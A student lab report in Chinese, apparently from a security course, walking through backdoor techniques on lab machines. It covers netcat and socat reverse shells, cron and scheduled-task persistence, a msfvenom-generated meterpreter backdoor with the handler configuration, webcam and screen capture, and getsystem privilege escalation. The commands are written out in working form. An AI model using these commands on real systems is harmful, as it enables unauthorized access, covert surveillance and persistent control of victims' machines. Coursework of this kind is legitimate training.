一、基础问题回答
1.例举你能想到的一个后门进入到你系统中的可能方式
答:在莫名其妙的网站下载某些莫名奇妙的播放器。
2.例举你知道的后门如何启动起来(win及linux)的方式?
答:对于windows是双击后门软件执行。对于linux,通过cron指令。
3.Meterpreter有哪些给你映像深刻的功能?
答:截屏功能,录音功能,调用摄像头的功能。
4.如何发现自己有系统有没有被安装后门?
答:使用某管家查杀一下就好。
二、使用netcat获取主机操作Shell,cron启动
1.windows获得linux的权限
(1)查阅本机windows ip地址
可知win的ip为192.168.1.157
(2)使用以下代码ncat.exe -l -p 4310 监听4310端口,等着linux链接这个端口
(3)使用命令 nc 192.168.1.157 4310 -e /bin/sh 让linux链接4310端口
(4)windows获得linux的shell
2.linux获得windows的权限
(1)查阅本机linux ip地址
(2)nc设置监听本地4310端口 nc -l -p 4310
(3)让windows去链接linux的4310端口
(4)linux获得windows的权限
3.nc数据传输
(1)windows监听本地4310端口 ncat.exe -l 4310 linux连接这个端口 nc 192.168.28.157 4310
4.nc定时启动
(1)windows监听本地4310端口 ncat.exe -l -p 4310
(2)crontab指令增加一条定时任务,让他在每小时的第54分钟执行 crontab -e 。
三、使用socat获取主机操作Shell, 任务计划启动
(1)按照步骤创建一个新任务,控制面板->系统和安全->管理工具->任务计划程序,在操作选项(菜单栏)中,选择“创建任务”,填写任务名称ZHYY,之后,新建触发器,选择开始任务时间为:工作站锁定时。
(2)创建完成之后,按 Win+L 快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行(可能会有很多同学出现一个黑屏,这里不用管它)
(3)在终端输入指令 socat - tcp:192.168.1.157:4310 此时可发现已经成功获得了一个windows shell
四、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
1.用以下代码生成后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=43101 -f exe > 007_backdoor.exe
2.通过nc指令将生成的后门程序传送到Windows主机上,输入后需要在Linux上输入指令ncat -nv
可以在C盘中看到该后门
3.在kali上使用 msfconsole 指令进入msf控制台,然后出现了下面这个奇怪的东西
4.配置参数攻击windows,这里需要把防火墙和杀毒软件全部关掉
(1)先按照以下代码进行配置
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp show options set LHOST 192.168.31.128 set LPORT show options exploit
发现端口是4444
(2)设置模块、载荷
(3)再次设置主机IP、端口,并再次用 show options 查看是否设置正确,发现设置正确
(4)启用模块
(5)在windows上运行后门程序,并在linux上查看,发现得到了windows远程控制权
五、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
1.直接输入命令 screenshot 进行截屏,发现截屏记录在root下
2.使用命令webcam_snap进行控制摄像头
3.进行提权
(1)先使用 先使用 getuid 再使用 用 getsystem 指令进行提权
(2)以管理员身份运行后门程序
(3)提权成功
六、实验感想
通过本次实验了解了后门植入原理和如何通过后门去控制其他主机,原理比较简单,也可以想得明白,因为是原理所以和实际操作会有偏差,因为被攻击的电脑有杀软和防火墙,不可能这么容易就被植入后门程序。与此同时也学到了控制权限之后能对受害主机进行的一系列操作,其中印象最深刻的就是控制截屏功能和摄像头的权限,希望在之后的课程中能够进一步地学习后门植入程序,也就是如何才能让后门程序逃过杀毒软件的查杀,或许这是计算机病毒里才可能讲到的内容了。